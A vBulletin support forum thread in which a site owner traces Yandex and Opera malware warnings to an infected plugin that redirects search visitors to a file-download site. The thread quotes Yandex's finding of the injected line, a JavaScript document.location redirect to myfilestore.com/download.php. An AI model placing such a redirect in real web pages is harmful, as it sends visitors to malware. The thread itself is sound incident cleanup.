Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 01-10-2017, 06:19 AM
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Posts: 340
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Malicious site warning

When i open my forum in Opera. Malicious site warning has shown
Quote:
Malicious site warning

This site may be hacked or contain malicious software. Visiting this page may be harmful.

Opera Software strongly discourages visiting this page.
Go back safely
Ignore this warning
Why was this page blocked?


Reported by Yandex
Our fraud reports are maintained by third-party vendors.
But Yandex show, "Your site doesn't have any violations"
How to remove this warning?
forum link: www.pakistanipoint.com

Reply With Quote
  #2  
Old 01-10-2017, 04:16 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

google "yandex remove site from blacklist" and you should find your answer.
Reply With Quote
Благодарность от:
creative-friend
  #3  
Old 01-14-2017, 01:42 PM
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Posts: 340
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Lynne View Post
google "yandex remove site from blacklist" and you should find your answer.
I am working on it almost one week but could not find any malicious code. Now Yandex show my website contains malicious code. I try to scan forum from different malware scanner, all clear my forum.
May you suggest me any malware scanner for scanning?
Reply With Quote
  #4  
Old 01-14-2017, 04:33 PM
Kane@airrifle's Avatar
Kane@airrifle Kane@airrifle is offline
 
Join Date: Jun 2011
Location: ZA
Posts: 181
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

filestore72

Resources:
https://www.vbulletin.com/forum/foru...lestore72-info

https://clients.urljet.com/knowledge...version-2.html

https://clients.urljet.com/knowledge...e123-Hack.html

--------------- Added [DATE]1484422187[/DATE] at [TIME]1484422187[/TIME] ---------------

And also protect your admincp folder with a passworded htaccess....
Reply With Quote
2 благодарности(ей) от:
creative-friend, TheLastSuperman
  #5  
Old 01-14-2017, 05:40 PM
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Posts: 340
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Kane@airrifle View Post
filestore72

Resources:
https://www.vbulletin.com/forum/foru...lestore72-info

https://clients.urljet.com/knowledge...version-2.html

https://clients.urljet.com/knowledge...e123-Hack.html

--------------- Added [DATE]1484422187[/DATE] at [TIME]1484422187[/TIME] ---------------

And also protect your admincp folder with a passworded htaccess....
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware
Reply With Quote
  #6  
Old 01-14-2017, 07:05 PM
z3r0's Avatar
z3r0 z3r0 is offline
 
Join Date: Apr 2005
Posts: 339
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by creative-friend View Post
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware

You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.
Reply With Quote
3 благодарности(ей) от:
creative-friend, Kane@airrifle, TheLastSuperman
  #7  
Old 01-14-2017, 07:32 PM
Kane@airrifle's Avatar
Kane@airrifle Kane@airrifle is offline
 
Join Date: Jun 2011
Location: ZA
Posts: 181
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by creative-friend View Post
my forum is not hacked or not redirect to filestore72 etc
its work fine.
all browser/scanner show my forum clean except Yandex.
Opera also use database of Yandex, So these two browsers detect a malware on forum and i'm unable to find that due to which code/file opera/yendex show malware
Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.
Reply With Quote
  #8  
Old 01-17-2017, 02:06 AM
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Posts: 340
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by Kane@airrifle View Post
Best way to test is a site search from a browser in incognito/private mode and not logged in to your forum. Try it, pick any of the returned links and you will be redirected to filestore for that session. I did this on Opera, Firefox, Chrome and Brave and all returned the redirect.

You need to start by buttoning down your admincp folder with a htaccess password. Then follow the guides as provided in my previous post.
Quote:
Originally Posted by z3r0 View Post
You are, I just got redirected to myfilestore dot com when testing coming to your site from a google search.
thank you so much

--------------- Added [DATE]1484626252[/DATE] at [TIME]1484626252[/TIME] ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt file

--------------- Added [DATE]1484627008[/DATE] at [TIME]1484627008[/TIME] ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake

Quote:
The following malicious code appears at your site from time to time:

document.location='http://myfilestore.com/download.php?id=ed4d0ec3'

when the following URL is loaded:

http://www.pakistanipoint.com/misc.p...22&js=js123456

Please, check your files and remove the malicious code.
Attached Files
File Type: txt 2580953&postcount=8code.txt (2.5 KB, 1 views)
Reply With Quote
  #9  
Old 01-17-2017, 02:58 AM
TheLastSuperman's Avatar
TheLastSuperman TheLastSuperman is offline
Senior Member
 
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by creative-friend View Post
thank you so much

--------------- Added [DATE]1484626252[/DATE] at [TIME]1484626252[/TIME] ---------------

I have found infected plugin by manually checking of all plugin.

Product: VBulletin
Hook location: parse_templates
Title: AME - Display Don't Auto Convert Option
Code: See attached txt for code


--------------- Added [DATE]1484627008[/DATE] at [TIME]1484627008[/TIME] ---------------

Now i disable this plugin, but how it will be completely remove???
delete this plugin or only remove code

Yandex support also identified this mistake
Remove the code shown in Red then save the plugin, afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
**Edit - Code to remove is marked by [Remove This Code] in attached file.
Attached Files
File Type: txt 2580957&postcount=9Code.TXT (2.6 KB, 2 views)
Reply With Quote
Благодарность от:
Kane@airrifle
  #10  
Old 01-17-2017, 03:16 AM
creative-friend creative-friend is offline
 
Join Date: Feb 2009
Posts: 340
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by TheLastSuperman View Post
afterwards save the plugin display order (when it shows list of plugins scroll to bottom and hit save).
Thank you so much sir

I cannot find how to save plugin display order
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:08 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04577 seconds
  • Memory Usage 2,301KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (10)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (7)post_thanks_box_bit
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (4)post_thanks_postbit
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (2)postbit_attachment
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • postbit_attachment
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete